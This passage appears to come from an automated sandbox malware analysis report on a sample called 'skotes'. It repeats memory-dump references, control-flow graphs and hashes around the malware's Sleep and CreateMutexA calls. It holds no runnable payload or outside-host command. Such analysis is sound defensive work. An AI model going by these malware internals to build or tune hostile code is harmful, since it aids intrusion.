                                                                                                                                                                                                        • Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: e7906ea3be00d0102f98233cc011d23c24b6224939a76d8ecc15153ff026282f
                                                                                                                                                                                                        • Instruction ID: fb6503ac9828eb8984851d03d4672a5e55a45f56fb790a9fb26ef1a5c3801fb1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7906ea3be00d0102f98233cc011d23c24b6224939a76d8ecc15153ff026282f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29311831F002099BEB18DB78DD89FADBB66EBC5328F24861DE414973E5C73989808757

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 238 9c9adc-9c9ae8 239 9c9afe-9c9b27 call 9dd663 238->239 240 9c9aea-9c9af8 238->240 248 9c9b29-9c9b35 239->248 249 9c9b55-9c9b57 239->249 240->239 241 9ca917 240->241 243 9ca953-9ca994 Sleep CreateMutexA 241->243 244 9ca917 call 9f6c6a 241->244 250 9ca996-9ca998 243->250 251 9ca9a7-9ca9a8 243->251 244->243 252 9c9b4b-9c9b52 call 9dd663 248->252 253 9c9b37-9c9b45 248->253 254 9c9b59-9ca916 call 9d80c0 249->254 255 9c9b65-9c9d91 call 9d7a00 call 9c5c10 call 9c8b30 call 9d8220 call 9d7a00 call 9c5c10 call 9c8b30 call 9d8220 249->255 250->251 256 9ca99a-9ca9a5 250->256 252->249 253->241 253->252 256->251
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: c35c2c7c61ec469864fe4dcedb6829d532050c96c510b562be515db192910734
                                                                                                                                                                                                        • Instruction ID: 788220286994864fa3c2d3a23ce04f44e7f790149f712dc6aa17cf451022cc07
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c35c2c7c61ec469864fe4dcedb6829d532050c96c510b562be515db192910734
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29213732B042059BEB18AB6CECCDF6DB765EBD1314F20421DE408973E5CB7999818B52

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 315 9ca856-9ca86e 316 9ca89c-9ca89e 315->316 317 9ca870-9ca87c 315->317 318 9ca8a9-9ca8b1 call 9c7d30 316->318 319 9ca8a0-9ca8a7 316->319 320 9ca87e-9ca88c 317->320 321 9ca892-9ca899 call 9dd663 317->321 331 9ca8e4-9ca8e6 318->331 332 9ca8b3-9ca8bb call 9c7d30 318->332 323 9ca8eb-9ca916 call 9d80c0 319->323 320->321 325 9ca94e-9ca987 call 9f6c6a Sleep CreateMutexA 320->325 321->316 335 9ca98e-9ca994 325->335 331->323 332->331 339 9ca8bd-9ca8c5 call 9c7d30 332->339 337 9ca996-9ca998 335->337 338 9ca9a7-9ca9a8 335->338 337->338 340 9ca99a-9ca9a5 337->340 339->331 344 9ca8c7-9ca8cf call 9c7d30 339->344 340->338 344->331 347 9ca8d1-9ca8d9 call 9c7d30 344->347 347->331 350 9ca8db-9ca8e2 347->350 350->323
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 05d16acdcbeea71214dc6e9dabf7ec5ac45c2ce4ec09225750ecc57aa876134b
                                                                                                                                                                                                        • Instruction ID: 4d0361d0fb37cd1a74f89c2bdef8c220a19861d50a0d11dceaffdb401a0a02c8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05d16acdcbeea71214dc6e9dabf7ec5ac45c2ce4ec09225750ecc57aa876134b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F219D31B452099BFB24A7A8889AF7DB665EFC1304F20081EE505D73D1CA7E898186A3

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 292 9ca34f-9ca35b 293 9ca35d-9ca36b 292->293 294 9ca371-9ca39a call 9dd663 292->294 293->294 295 9ca93a 293->295 300 9ca39c-9ca3a8 294->300 301 9ca3c8-9ca916 call 9d80c0 294->301 297 9ca953-9ca994 Sleep CreateMutexA 295->297 298 9ca93a call 9f6c6a 295->298 307 9ca996-9ca998 297->307 308 9ca9a7-9ca9a8 297->308 298->297 304 9ca3be-9ca3c5 call 9dd663 300->304 305 9ca3aa-9ca3b8 300->305 304->301 305->295 305->304 307->308 311 9ca99a-9ca9a5 307->311 311->308
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
